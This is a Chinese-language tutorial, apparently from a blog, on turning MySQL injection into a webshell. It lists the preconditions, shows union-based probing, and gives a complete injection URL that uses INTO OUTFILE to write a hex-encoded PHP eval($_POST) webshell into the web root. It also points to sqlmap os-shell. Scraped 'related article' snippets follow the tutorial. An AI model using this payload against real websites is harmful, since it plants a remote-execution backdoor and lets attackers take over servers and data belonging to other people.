2. 程式人生 > >【sql注入教程】mysql注入直接getshell

【sql注入教程】mysql注入直接getshell

阿新 發佈:2019-01-09

Mysql注入直接getshell的條件相對來說比較苛刻點把

1:要知道網站絕對路徑,可以通過報錯,phpinfo介面,404介面等一些方式知道

2:gpc沒有開啟,開啟了單引號被轉義了,語句就不能正常執行了

3:要有file許可權,預設情況下只有root

4:對目錄要有寫許可權,一般image之類的存放突破的目錄就有

在實際環境中我只遇過一次,為了做實驗,我把php.ini檔案裡面的gpc改為了Off,重啟了一下apahce服務

首先是常規的注入語句

And 1=1 and 1=2 之類的,在輸入單引號的時候報錯了得到了覺得路徑,寫shell需要用到

 

然後order by union

 

原創文章,希望大家多多支援

然後就是用into outfile寫檔案

http://127.0.0.1/mysqltest/index.php?age=25%20union%20select%201,2,3,4,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e%20into%20outfile%20%27C:/appserv/www/mysqltest/shell1.php%27

0x3c3f706870206576616c28245f504f53545b2774657374275d293f3ehex編碼的<?php eval($_POST['test'])?>

寫的檔名一定要是不存在的,不然就會不成功

這裡的路徑要用/,如果要用\的話,就要用\\ 轉移成一個

C:\\appserv\\www\\mysqltest\\shell1.php

 

也可以直接用穿山甲來寫

 

或者sqlmapos-shell

原創文章,希望大家多多支援我

相關推薦

sql注入教程mysql注入直接getshell

Mysql注入直接getshell的條件相對來說比較苛刻點把 1:要知道網站絕對路徑,可以通過報錯,phpinfo介面,404介面等一些方式知道 2:gpc沒有開啟,開啟了單引號被轉義了,語句就不能正常執行了 3:要有file許可權,預設情況下只有root有 4:

1分鐘教程如何在手機桌面上直接打開51CTO博客?

51cto博客 移動端博客首頁 51CTO博客移動端新版首頁上線,就是想讓好文章,隨時隨地隨你“移動”那麽你猜,在手機上打開博客需要多久呢?只需 1 秒!!!第一步:用手機自帶瀏覽器打開博客,地址:http://blog.51cto.com/,點擊下面紅框中的按鈕~第二步:選擇“添加到主屏幕”第三步:

PL/SQL developer+sqlplus相關軟體安裝教程+漢化教程

#想要使用PL/SQL developer操作ORACLE資料庫時必備的工具: #1. PL/SQL developer #2. sqlplus【此軟體是oracle客戶端黑視窗,一般不用,但是必須安裝才可以使用,因為需要配置PL/SQL developer的引數】 ##安裝流程 #1、

TP5 :請求方法注入

方法注入 使用Request物件的hook方法的注入功能,在Request請求物件中新增自定義方法 // 通過hook方法注入動態方法 Request::hook('user','getUserIn

FastDev4Android框架開發AndroidAnnnotations注入框架使用之最佳實踐SharedPreferences(十七)

轉載請標明出處:  (一).前言:    前面我們已經對於AndroidAnnotations使用Adapters和lists做了講解,今天我們開始具體學習一下使用DI框架SharedPrefe

數據庫MySQL數據庫(二)

關閉數據庫 dos命令 medium 數據庫密碼 gin mysql tables 日期 導出數據 一、數據庫文件的導出 1.在DOS命令行下導出數據庫(帶數據) mysqldump -u root -p 數據庫名 > E:\wamp\www\lamp175\lam

數據庫MySQL數據庫(三)

沒有 特殊 進行 主鍵索引 rst ble 刪除 索引 可能 一、MySQL當中的索引: 數組當中我們見過索引;它的好處就是能夠快速的通過下標、索引將一個信息查到;或者說 能夠快速的定位到一個信息; 1.MySQL中的索引是什麽? 它是將我們表中具有索引的那個字段,

數據庫MySQL數據庫(一)

管理系統 ins 我的電腦 使用 語句 命令行 mar alt rac 一、MySQL數據庫系統 MySQL數據庫系統就是用來對數據庫、數據的一些管理 二、數據庫系統 1.數據庫 就是用來存儲各種數據的 2.數據庫管理系統 就是用來管理各種數據庫的數據的一個系統

數據庫MySQL 復制表結構

class code 來講 tab into 方法 查看 state 但是 介紹 有時候我們需要原封不動的復制一張表的表結構來生成一張新表,MYSQL提供了兩種便捷的方法。 例: CREATE TABLE tb_base( id INT NOT NULL PRIMA

Unity3D基礎教程給初學者看的Unity教程(零):如何學習Unity3D

cos 詳解 component lock index unity3d遊戲 design 技術棧 log 【Unity3D基礎教程】給初學者看的Unity教程(零):如何學習Unity3D http://www.cnblogs.com/neverdie/p/How_To_

SQL server基礎objectproperty()函數

del dex scons 手動更新 asr ble rtu pad sdi SQL Server OBJECTPROPERTY使用方法 OBJECTPROPERTY 返回有關當前數據庫中的模式作用域對象的信息。此函數不能用於不是模式範圍的對象,例如數據定義語言(D

SQL server初級SQL索引(一)

定位 統計表 cut 語法分析 man net 程序代碼 源配置 amount         SQL索引【一】(此文章為“數據庫性能優化二:數據庫表優化”附屬文章之一)   SQL索引在數據庫優化中占有一個非常大的比例, 一個好的索引的設計,可以讓你的效率提高幾十甚

SQL server初級數據庫性能優化三:程序操作優化

地球 解釋 spa 記錄 employ it168 等於 bsp 實現   數據庫優化包含以下三部分,數據庫自身的優化,數據庫表優化,程序操作優化.此文為第三部分   數據庫性能優化三:程序操作優化 概述:程序訪問優化也可以認為是訪問SQL語句的優化,一個好的SQL語句是

SQL server基礎SQL視圖加密,永久隱藏視圖定義的文本

選擇 creat reat 右擊 con with roc ron div SQL可以對視圖進行加密。也就是,可永久隱藏視圖定義的文本。 註意 此操作不可逆。加密視圖後,無法再修改它,因為無法再看到視圖定義。如果需要修改加密視圖,則必須刪除它並重新創建另一個視圖。 示

SQL server基礎SQL存儲過程和函數的區別

lan 嵌入 執行計劃 臨時 roc 沒有 存在 exe execution 本質上沒區別。只是函數有如:只能返回一個變量的限制。而存儲過程可以返回多個。而函數是可以嵌入在sql中使用的,可以在select中調用,而存儲過程不行。執行的本質都一樣。 函數限制比較多

黑馬PHP教程錯誤詳解

error_log 報告 color 顯示 自定義 borde 技術 誤報 處理 一,錯誤通常分3種 二,錯誤的分級 三,錯誤的觸發 四,顯示錯誤報告 問題一:設置顯示錯誤報告 問題二:顯示哪些級別的錯誤報告 五,錯誤日誌的記錄問題 問題一

數據庫Mysql學習-mysql安裝

cte tar log mage class 改密碼 download www 提示符 參考:https://www.cnblogs.com/kennyliu/p/8004808.html 一、下載 進入:https://dev.mysql.com/downloa

DVWASQL Injection(Blind)SQL盲註 Low Medium High Impossible

submit strong size users bsp amp select dmi mit 1.初級篇 Low.php 加單引號提交 http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘&am

zabbix系列教程四、用戶自定義監控

系統用戶 新建 mct 運用 systemctl 一個 start shell 教程 本篇介紹運用zabbix進行自定義監控,以系統用戶登錄數量為例。 一、zabbix自定義語法 UserParameter=<key>,<shell command

第四章MySQL日誌文件管理

文件目錄 mysqld 關閉 heap lib IE tput 列表 自帶 1、日誌文件管理概述: 配置文件:/etc/my.cnf 作用:MySQL日誌文件是用來記錄MySQL數據庫客戶端連接情況、SQL語句的執行情況以及錯誤信息告示。 分類:MySQL日誌文件分為